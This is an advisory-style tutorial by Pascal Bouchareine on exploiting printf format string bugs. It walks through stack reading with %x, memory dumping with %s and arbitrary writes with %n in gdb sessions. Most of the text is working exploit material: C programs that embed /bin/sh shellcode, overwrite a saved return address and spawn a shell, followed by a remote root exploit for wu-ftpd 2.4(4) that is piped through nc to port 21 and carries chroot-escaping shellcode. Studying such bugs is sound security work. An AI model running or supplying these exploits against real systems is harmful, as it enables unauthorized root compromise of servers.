COMMAND

    Format bugs

SYSTEMS AFFECTED

    Most systems

PROBLEM

    Pascal Bouchareine posted following.  This paper tries to  explain
    how to exploit  a printf(userinput) format  bug, reported in  some
    advisories.  The approach is primary, and more precisely does  not
    take into account any existing exploit (wu-ftpd, ...).

    A  general  knowledge  of  C  programming and assembler is assumed
    throughout this article (stack issues, registers, endian storage).

    Let's begin with an experiment. Have a look at the following code:

        void main()
        {
            char tmp[512];
            char buf[512];

            while(1) {
              memset(buf, '\0', 512);
              read(0, buf, 512);
              sprintf(tmp, buf);
              printf("%s", tmp);
            }
        }

    It allocates a stack for tmp and buf (buf having the lower address
    on the stack),  reads user input  into buf, calls  sprintf to fill
    tmp and prints out tmp.  Let's try it :

        [pb@camel][formats]> ./t
        foo-bar
        foo-bar
        %x %x %x %x
        25207825 78252078 a782520 0

    Clumsy coders are used to see  this kind of things, but let's  see
    exactly what happens.

    When sprintf encounters a  conversion string, it simply  takes the
    first pushed word (32 bits, 4 bytes on intel) on the stack and  in
    the case of "%x" converter, prints it to screen as hexadecimal.

    If arguments are explicitly given, it works well, but if they  are
    missing and supposing sprintf's stack is empty, the function  hits
    the caller's stack  directly, provided that  the stack is  growing
    downward (intel architecture in  the example).  For  more details,
    let's look at this second example:

        [pb@camel][formats]> gdb ./t
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "i686-pc-linux-gnu".
        (gdb) break sprintf
        Breakpoint 1 at 0x80481f3
        (gdb) run
        Starting program: /usr/home/pb/code/format/./t
        %x

        Breakpoint 1, 0x80481f3 in _IO_sprintf ()
        (gdb) x/20x $esp
        0xbffff670:     0xbffffa80      0x080481af      0xbffff880      0xbffff680
        0xbffff680:     0x000a7825      0x00000000      0x00000000      0x00000000
        0xbffff690:     0x00000000      0x00000000      0x00000000      0x00000000

    * 0xbffffa80 and 0x08481af are a plain stack frame footer
    * 0xbffffa80 is the calling function's stack frame address
    * 0x08481af is the return address in main().

    Then there are two arguments for sprintf:
    * 0xbffff880 is tmp[]'s address
    * 0xbffff680 is buf[]'s address

    Look at what's just after this at address 0xbffff680.

    Yep, this is the beginning  of main's stack frame, with  the 0x400
    alloc'ed bytes for tmp[] and  buf[] where there is what  have been
    entered as input:

        0x000a7825 (little endian : %x\n).

    Let's look at the first example again:

        [pb@camel][formats]> ./t
        %x %x %x %x
        25207825 78252078 a782520 0

    The %x converter makes sprintf hit  a part of the stack where  you
    have:

        "\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"

    This is buf[]'s  content, with the  0 terminating byte  [a word in
    this case].

    Let's study it more in detail, adding a function named do_it, with
    a 4  bytes stack  of 0x04030201,  and let's  see what happens when
    sprintf(dst, "%x") is called from it:

        void do_it(char *d, char *s)
        {
          char buf[] = "\x01\x02\x03\x04";
          sprintf(d, s);
        }

        main()
        {
          char tmp[512];
          char buf[512];

          while(1) {
	          memset(buf, '\0', 512);
	          read(0, buf, 512);
	          do_it(tmp, buf);
	          printf("%s", tmp);
          }
        }

    Of course, sprintf is expected to hit do_it()'s buf[] word,  using
    %#010x as format converter:

        [pb@camel][formats]> ./t
        %#010x
        0x04030201

    So  one  has  access  to  do_it()'s  stack contents, and can guess
    main()'s  stack  frame  address,  and  do_it's return address with
    ease:

        [pb@camel][formats]> ./t
        %#010x %x %x %x
        0x04030201 bffffa00 bffffac0 80485af

    Oh, let's suppose this second pointer (0xbffffa00) is alloc'ed  to
    push sprintf's argument, but 0xbffffac0 and 0x080485af are  really
    the saved ebp, return address:

        (gdb) bt
        #0  0x8048526 in do_it ()
        #1  0x80485af in main ()
        (gdb) x/2x $ebp
        0xbffff6b0:     0xbffffac0      0x080485af

    So easily, one  has access to  the calling function's  stack frame
    address.

    In this example, you can  easily remotely guess the location  of a
    return address (main's, for example) to overwrite AND the  address
    of the  eggshell (if  any): this  is done  by adding  0x04 to  the
    caller's saved $ebp (the second  element of this ($ebp, ret)  pair
    is at 0xbffffac0 + 0x04 == 0xbffffac4):

        (gdb) x 0xbffffac4
        0xbffffac4:     0x080484be
        (gdb) bt
        #0  0x8048526 in do_it ()
        #1  0x80485af in main ()
        #2  0x80484be in ___crt_dummy__ ()

    So main's return  address (#2) is  in ___crt_dummy__ for  the time
    being,  but  can  be  changed  to  anything  you  want  if you can
    overwrite contents of 0xbffffac4...

    And  for  eggshell  address,  there  are  many ways to guess.  The
    simplest  way  is  to  find  buf[]'s  address, which is [bottom of
    main's stack] - 0x200 + some stack allocated informations:

        (gdb) break memset
        Breakpoint 1 at 0x8048408
        (gdb) c
        Continuing.
        %#010x %x %x %x
        0x04030201 bffffa00 bffffa20 80485af

        Breakpoint 1, 0x40078428 in memset ()
        (gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
        %#010x %x %x %x

    Although this quite  depends on the  program you are  running, you
    can see that methods to  find a stack writable return  address and
    a stack executable eggshell are quite easy.

    However, the best way  to guess stack architecture  remotely, when
    one has no access  to the running process,  is to "eat" the  stack
    with  many  "%x"  or  "%...s"  format  converters  until  a [stack
    address, code segment  address] pair is  found and the  user input
    string itself is dumped.

    Eating  stack  space  with  "junk"  format  converters  until  the
    beginning of input string is found is a really nice way to control
    what happens  next: you  now have  controllable arguments  to "%*"
    format converters, and this really,  really comes in handy.   Have
    a look at this (using the first example):

        [pb@camel][formats]> ./t
        AAAA%x
        AAAA41414141

    Remember, the stack is empty.  The %x converter makes sprintf take
    the beginning of  the input buffer  as an arg-list  for the format
    strings.

    One has *many* ways to play around with this.

    This "let me control the stack" feature is your friend just as gdb
    is.  You can dump the whole stack, guess stack addresses, and even
    write  to  it  (as  will  be  explained later using %n converter).
    Let's look at this example :

        static char find_me[] = "..Buffer was lost in memory\n";

        main()
        {
          char buf[512];
          char tmp[512];

          while(1) {
	          memset(buf, '\0', 512);
	          read(0, buf, 512);
	          sprintf(tmp ,buf);
	          printf("%s", tmp);
          }
        }

    The goal is to print the string find_me[]. In this simple example,
    you don't have to search  (by %x dummy converters) how  many bytes
    of stack you need to "eat"  before you hit the input buffer:  this
    is the very first one  (the example with "AAAA%x" showed  it quite
    clearly).   So  you  basically  just  have  to issue the following
    "pseudo string" to print out the buffer:

        [4 bytes address of find_me]%s

    Yes!  It is *that* simple: in this case, the input buffer is  both
    the format string AND the format string argument...).

    Let's do it simply :

        [pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
        (garbage)Buffer was lost in memory

    The garbage is the  beginning of the format  string.  So, you  are
    able to dump any part of memory  you need to.  What was true  with
    remote buffer  overflows is  not anymore:  you dont  NEED to  seek
    return address anymore.  You  don't need to guess anything,  since
    you  can  inspect  memory  to  find  it.   (Er,  this is true with
    printf()  issues,  but  not  when  you  can't  see  what the input
    produced.  See setproctitle() for example).

    Then comes the second (and more funny) part.

    All that wouldn't be that funny if we didn't have the "%n"  format
    converter.   This one  takes an  (int *)  argument, and writes the
    number of bytes written *so far* to that location.

    Let's try this (with the very-simple-AAAA%x proggy again):

        [pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
        [pb@camel][formats]> gdb ./t
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "i686-pc-linux-gnu".
        (no debugging symbols found)...
        (gdb) set args < file
        (gdb) break main
        Breakpoint 1 at 0x8048529
        (gdb) run
        Starting program: /usr/home/pb/code/format/./t < file
        (no debugging symbols found)...
        Breakpoint 1, 0x8048529 in main ()
        (gdb) watch *0xbffff770
        Hardware watchpoint 2: *3221223280
        (gdb) c
        Continuing.
        Hardware watchpoint 2: *3221223280

        Old value = 0
        New value = 4
        0x400323f3 in vfprintf ()
        (gdb) x 0xbffff770
        0xbffff770:     0x00000004

    This time, 4 bytes encoded into the format string (an address) are
    written and the "%n" converter  made sprintf report this where  it
    was told to (i.e. 0xbffff770).

    Let's play with this a little more.  This time, the generated-file
    looks like this:

        printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file

    After two watchpoint hits, at 0xbffff770 you have:

        (gdb) x 0xbffff770
        0xbffff770:     0x00000808

    sprintf wrote  8 bytes  (two addresses),  and "%n"  made it report
    this to 0xbffff770 and 0xbffff771.

    Now, suppose you have an  eggshell at 0xbffff710, and the  guessed
    return address  lies at  0xbffffa80.   You can't  afford to  write
    0xbffff710 bytes into the buffer to make sprintf (through the "%n"
    converter) write  this value  on the  stack.   Remember people are
    usually affraid of buffer overflows and therefore cut their  input
    buffers).

    But you can use a byte-per-byte construction to build the address.
    Since "%n" makes sprintf write the number of bytes written so  far
    on the stack,  you need to  substract the number  of bytes already
    written to each following fragment.

    Since the int * thing would erase bytes already written, you  have
    to write  address from  the lower  significant byte  to the higher
    significant byte.

    Since you need to have written 0xff bytes before you can write the
    0xbf byte,  and moreover,  you can  only *increment*  the internal
    number-of-written-bytes counter, you have to use 0x1bf, erasing  a
    meaningless byte on the stack.

    Note that  you could  use the  "%hn" converter,  and make  sprintf
    write  short  int  arguments  to  the  stack.   But  this won't be
    discussed here.   Here is  the "address  builder" code  explain so
    far:

        main()
        {
          char b1[255];
          char b2[255];
          char b3[255];

          memset(b1, 0, 255);
          memset(b2, 0, 255);
          memset(b3, 0, 255);
          memset(b1, '\x90', 0xf7 - 0x10);
          memset(b2, '\x90', 0xff - 0xf7);
          memset(b3, '\x90', 0x01bf - 0xff);

          printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
                 "\x81\xfa\xff\xbf" // ditto
                 "\x82\xfa\xff\xbf" // ..
                 "\x83\xfa\xff\xbf" // last byte.

                 "%%n"   // 1) gives 0x10 ( 16 first bytes )
                 "%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
                 "%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
                 "%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
                 ,b1, b2, b3);

          // you now have 0xbffff710 at 0xbffffa80
        }

    Let's try it:

        (after 3 hits on watchpoint)
        (gdb) c
        Continuing.
        Hardware watchpoint 3: *3221224064

        Old value = 16774928
        New value = -1073744112
        0x400323f3 in vfprintf ()
        (gdb) x/2 0xbffffa80
        0xbffffa80:     0xbffff710      0xbf000001

    Is seems to work quite well. The work is almost finished now,  you
    just have  to push  an eggshell  after all  this format trick, and
    make the program jump back in  it.  Let's try to apply  everything
    said before, with the following vulnerable program:

        void do_it(char *dst, char *src)
        {
          int foo;
          char bar;

          sprintf(dst, src);
        }

        main()
        {
          char buf[512];
          char tmp[512];

          memset(buf, '\0', 512);
          read(0, buf, 512);
          do_it(tmp, buf);
          printf("%s", tmp);
        }

    1) First you  have to find  where's your input  buffer, to control
       the format string.

        [pb@camel][formats]> gcc vuln.c -o v
        [pb@camel][formats]> ./v
        AAAA %x %c %x
        AAAA 0 À bffffac0
  		        (int foo, char bar, stack)
        ...

        AAAA %x %x %x %x %x %x %x %x %x
        AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
  		        (the *output* buffer is at offset 28)

    Look at the stack frame, which is a (stack addr, code addr)  pair:
    the return address in main  is 0x0804859f, main's stack saved  ebp
    and ret addr begins at 0xbffffac0.

    You now  know that  main's return  address is  at 0xbffffac4  (the
    second part of the [stack, code] pair is of course at pair + 4).

    Then you get some information about main's return address:

        printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v | hexdump

        0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
        0000010 6230 6666 6666 6361 3830 3430 3538 3838
        0000020 6662 6666 3666 3063 6662 6666 3866 3063
        0000030 3134 3134 3134 3134 7720 2065 7274 2079
        0000040 fad4 bfff 84be 0804 0a01 000a

    stack/ret  is   0xbffffad4/0x080484be  (check   this  with   gdb).
    Supposing  do_it's  frame  is  something  like  0x400 bytes before
    main's frame, (in fact, it  is 0x410 bytes), you can  find do_it's
    stack frame  address, since  you know  that there  must be  main's
    saved frame  pointer followed  by a  code segment  return address,
    then by main's stack:

    After a lot of tries you have:

        printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v | hexdump

        0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
        0000010 6230 6666 6666 6361 3830 3430 3538 3838
        0000020 6662 6666 3666 3063 6662 6666 3866 3063
        0000030 3134 3134 3134 3134 7720 2065 7274 2079
        0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
        0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
        0000060 6230 6666 6666 6361 3830 3430 3538 3838
        0000070 6662 6666 3666 3063 6662 6666 3866 3063
        0000080 3134 3134 3134 3134 7720 2065 7274 2079
        0000090 0a0a

    (this prints  "..we try  [contents of  0xbffff6b0])   Bingo! There
    you have (we try .. is just before offset 0x40)

        0xbffffac0,0x08048588 at 0xbffff6b0.

    Remember the (stack, code) pair addresses? This is in fact do_it's
    stack frame.   You can see  sprintf's args just  after: 0xbffff6c0
    and  0xbffff8c0.   These  are   addresses  of  the  two   buffers.
    0x41414141 is the  beginning of the  input buffer, so  you can see
    that hexdump's  offset 0x50  is at  address 0xbffff6c0,  and since
    you are good  at math, you  confirm that hexdump's  offset 0x40 is
    indeed at 0xbffff6b0.

    This process lets you remotely guess
      1) stack return address,
      2) buffer address.

    You have  all the  information you  need to  format the  stack, so
    let's get to the next  step: build the eggshell &  the appropriate
    buffer.

    The buffer will  lie at 0xbffff8c0.  BUT, since it  is filled with
    lots of  illegal instructions  (i.e. the  format converters),  the
    "\x90" string  must end  with a  "\xeb\x02" to  jump over the "%n"
    format  converters,  therefore,  you  need  not  worry  about  the
    effective egg address.

    So all you need to do is to push 4 addresses (one address per byte
    of the return address to  overwrite), a series of "%x"  converters
    to "eat" stack  space, then a  series of nops  followed by a  "%n"
    converter (in  order to  build the  return address)  and somewhere
    the eggshell.

    Tough this is not the  easiest part, a little brain  boost (coffe,
    cocaine, coca-cola(tm), anything you like) leads to:

        void main()
        {
          char b1[255];
          char b2[255];
          char b3[255];
          char b4[255];
          char xx[600];
          int  i;

          char egg[] =
             "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
             "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
             "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


        //  ( (void (*)()) egg)();

          memset(b1, 0, 255);
          memset(b2, 0, 255);
          memset(b3, 0, 255);
          memset(b4, 0, 255);
          memset(xx, 0, 513);

          for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
            strcpy(&xx[i], "%x");
          }

          memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
  					          // 16 (4 addresses)
					          // 2  (%n)
					          // 40 (%x output - "guess it..")
					          //     use nice formats for
					          //     fixed output size... :)
					          //     + 200- (4 bytes)

          memset(b2, '\x90', 0xf8 - 0xd0 - 2);  // first 0x90 string is at
					        // 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
					        // -2 because of "\xeb\x02"

          memset(b3, '\x90', 0xff - 0xf8 - 2);  // ditto, with -2.

          memset(b4, '\x90', 0x01bf - 0xff - 2);  // ditto.

          printf("\xb4\xf6\xff\xbf"  //
                 "\xb5\xf6\xff\xbf"  // this points to do_it's
                 "\xb6\xf6\xff\xbf"  // return address storage word.
                 "\xb7\xf6\xff\xbf"  //
                 "%s"    // 0) there are 6 "%x", to eat stack until the input buf
	 	         //    begins to control the format strings.

                 "%s\xeb\x02%%n"   // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
                 "%s\xeb\x02%%n"   // 2) gives 0xf9
                 "%s\xeb\x02%%n"   // 3) gives 0xff
                 "%s\xeb\x02%%n%s" // 4) gives 0x01bf
                 , xx, b1, b2, b3, b4, egg);

        }

    Let's give it a final try:

        [pb@camel][formats]> ( ./b ; cat ) | ./v
        id
        uid=1001(pb) gid=100(users) groups=100(users)
        date
        Sat Jul 15 22:15:07 CEST 2000

    These format bugs are  really nasty.  First,  if you can read  the
    output of the final buffer (e.g. printf(Userinput)), you obviously
    have control over the computer processing it.  You have some  kind
    of remote-debugger-access to the  machine, that allows you  to get
    in at the first try.  These are bad news for developpers. (wu-ftpd
    format bug used by an aware person is a one-try remote root..).

    Playing around  format args  and pointers  allows us  to construct
    some  kind  of  "generic   format  string"  that  will   overwrite
    *certainly* the  caller's return  address.   This must  be coupled
    with a  remote return  address guess  to work  properly, but gives
    *at least* the same luck rate as remote buffer overruns.  Even  if
    you don't see  what you do  (setproctitle), this is  still an easy
    way to get in.

    This  is  what  Pascal  built  against his old wu-ftpd [wu-2.4(4)]
    using the  above technique.   It worked,  but he  had to  cut  his
    intput format  string to  512 bytes:  he included  the eggshell in
    another part of memory, using  the PASS command.  This  address is
    still easy to guess.

    /*
     * Sample example - part 2: wu-ftpd v2.4(4), exploitation.
     *
     * usage:
     *  1) find the right address location/eggshell location
     *     this is easy with a little play around %s and hexdump.
     *     Then, fix this exploit.
     *
     *  2) (echo "user ftp"; ./exploit; cat) | nc host 21
     *
     *      echo ^[c to clear your screen if needed.
     *
     *  Don't forget 0xff must be escaped with 0xff.
     *
     *
     */
    
    main()
    {
      char b1[255];
      char b2[255];
      char b3[255];
      char b4[255];
      char xx[600];
      int  i;
    
      char egg[]= /* Lam3rZ chroot() code */
       "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
       "\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
       "\xeb\x6b\x5e\x31\xc0\x31"
       "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
       "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
       "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
       "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
       "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
       "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
       "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
       "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
    
    //  ( (void (*)()) egg)();
    
      memset(b1, 0, 255);
      memset(b2, 0, 255);
      memset(b3, 0, 255);
      memset(b4, 0, 255);
      memset(xx, 0, 513);
    
      for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */
        strcpy(&xx[i], "%x");
      }
    
      memset(b1, '\x90', 0xa3 - 0x50);
      memset(b2, '\x90', 0xfe - 0xa3 - 2);
      memset(b3, '\x90', 0xff - 0xfe);
      memset(b4, '\x90', 0x01bf - 0xff);     // build ret address here.
			             // i found 0xbffffea3
    
      printf("pass %s@oonanism.com\n", egg);
      printf("site exec .."
             "\x64\xf9\xff\xff\xbf"  // insert ret location there.
             "\x65\xf9\xff\xff\xbf"  // i had 0xbffff964
             "\x66\xf9\xff\xff\xbf"
             "\x67\xf9\xff\xff\xbf"
             "%s"
             "%s\xeb\x02%%n"
             "%s\xeb\x02%%n"
             "%s%%n"
             "%s%%n\n"
             , xx, b1, b2, b3, b4);
    
    }

SOLUTION

    Nothing yet.